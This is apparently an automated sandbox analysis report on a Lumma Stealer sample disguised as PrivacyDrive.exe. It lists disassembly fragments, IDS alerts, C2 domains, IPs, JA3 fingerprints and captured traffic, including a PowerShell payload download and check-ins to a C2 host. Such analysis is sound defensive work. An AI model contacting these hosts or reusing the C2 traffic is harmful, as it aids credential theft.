Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	4_2_051C6910
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_051B399C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	4_2_051E49F0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_051D2813
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_051D2813
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	4_2_051E3870
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_051D2899
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_051D2899
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	4_2_051DA880
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	8_2_00F86013
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	8_2_00F8600C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	8_2_00F811B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	8_2_00F9D0CE
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	8_2_00F92132
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	8_2_00F9D134
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_00FB12FC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	8_2_00FB12FC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_00FBC2B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_00FA429B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_00FA429B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	8_2_00FAC282
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	8_2_00FB5272
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_00FA4215
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_00FA4215
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	8_2_00FB63F2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	8_2_00F8539E
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	8_2_00F98312
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	8_2_00F874E1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	8_2_00F7F4B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, 0000000Bh	8_2_00FA54B5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx ebp, word ptr [edi]	8_2_00FB0432
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	8_2_00F92403
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000744h]	8_2_00FA45CB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_00FA45CB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_00FA45CB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	8_2_00F925AE
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [eax], cx	8_2_00F98582
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_00F9F577
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	8_2_00F8F6C4
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	8_2_00F766B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_00F9A692
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	8_2_00F9D652
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	8_2_00F9D652
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [eax], cx	8_2_00FBB612
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	8_2_00FA076F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	8_2_00FA076F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	8_2_00F77712
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, ecx	8_2_00F858A8
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_00FB9832
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh	8_2_00FB9832
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then push ebx	8_2_00F8F835
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	8_2_00F859AB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+28h]	8_2_00F859AB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	8_2_00F8C952
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	8_2_00F82911
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	8_2_00F87AF3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then jmp eax	8_2_00F87BF4
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	8_2_00FBBBE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	8_2_00F90B95
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [esi], ax	8_2_00F90B95
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, eax	8_2_00F78B72
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then jmp ecx	8_2_00FB0B62
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_00FA4B4C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	8_2_00FB2B02
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	8_2_00F84DDD
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	8_2_00FA1DB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	8_2_00F99DA7
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-34h]	8_2_00F95D92
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	8_2_00FBBD62
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	8_2_00FB0EF0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, ebp	8_2_00F7BEE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, ebp	8_2_00F7BEE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	8_2_00FA3ED2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	8_2_00FBBED2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, dword ptr [ebp-3Ch]	8_2_00F9FEC1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_00FA4E2D
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_00FB4E22
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_00FA4E18
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	8_2_00FA0E11
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_00FBBFE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	8_2_00FA3EB7
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	8_2_00FA3F33
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	8_2_0121A1E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	8_2_011DF7B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	8_2_01211100
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then jmp ecx	8_2_0120F160
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_0120314A
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, eax	8_2_011D7170
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	8_2_011EF193
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [esi], ax	8_2_011EF193
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then jmp eax	8_2_011E61F2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	8_2_011E60F1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	8_2_0121A360
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-34h]	8_2_011F4390
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	8_2_012003B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	8_2_011F83A5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	8_2_011E33DB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	8_2_01202531
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	8_2_012024B5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_0121A5E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_01213420
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_0120342B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	8_2_011FF40F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_01203419
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	8_2_0120F4EE
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, dword ptr [ebp-3Ch]	8_2_011FE4C2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	8_2_012024D0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	8_2_0121A4D0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, ebp	8_2_011DA4E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, ebp	8_2_011DA4E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	8_2_011FB6CC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	8_2_011FB732
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	8_2_011F0730
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	8_2_011E4611
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	8_2_011E460A
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	8_2_011F6910
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	8_2_011E399C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	8_2_012149F0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_01202813
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_01202813
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	8_2_01213870
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_0121A8B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	8_2_0120A880
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_01202899
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_01202899
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_0120F8FA
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	8_2_0120F8FA
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_011FDB75
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [eax], cx	8_2_011F6B80
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	8_2_011F0BAC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000744h]	8_2_01202BC9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_01202BC9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_01202BC9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx ebp, word ptr [edi]	8_2_0120EA30
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	8_2_011F0A01
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, 0000000Bh	8_2_01203AB3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	8_2_011DDAB0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	8_2_011E5ADF
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	8_2_011D5D10
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	8_2_011FED6D
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	8_2_011FED6D
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [eax], cx	8_2_01219C10
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	8_2_011FBC50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	8_2_011FBC50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_011F8C90
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	8_2_011D4CB0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	8_2_011EDCC2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	8_2_011E0F0F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	8_2_011EAF50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	8_2_011E3FA9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+28h]	8_2_011E3FA9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_01217E30
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh	8_2_01217E30
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then push ebx	8_2_011EDE33
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, ecx	8_2_011E3EA6

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.4:49748 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.4:49745 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.4:49744 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2056078 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop) : 192.168.2.4:50546 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.4:49749 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49744 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49745 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49748 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49748 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49749 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49749 -> 172.67.206.221:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: abortinoiwiam.shop
Source: Malware configuration extractor	URLs: deallyharvenw.shop
Source: Malware configuration extractor	URLs: defenddsouneuw.shop
Source: Malware configuration extractor	URLs: pumpkinkwquo.shop
Source: Malware configuration extractor	URLs: covvercilverow.shop
Source: Malware configuration extractor	URLs: surroundeocw.shop
Source: Malware configuration extractor	URLs: priooozekw.shop
Source: Malware configuration extractor	URLs: candleduseiwo.shop
Source: Malware configuration extractor	URLs: racedsuitreow.shop

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 185.255.122.133 185.255.122.133
Source: Joe Sandbox View	IP Address: 172.67.206.221 172.67.206.221

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: ICMESE ICMESE
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uploads/il2.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: finalstepgo.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: racedsuitreow.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=2VbLUtXoIqa2pl0uSvd6B6CRPFFCp4FfUF1UfiX3kg8-1727365608-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: racedsuitreow.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: racedsuitreow.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=fw93lyY_BMEJeILlolM3es0EfUXi8G49RoVHMxHuql0-1727365619-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: racedsuitreow.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
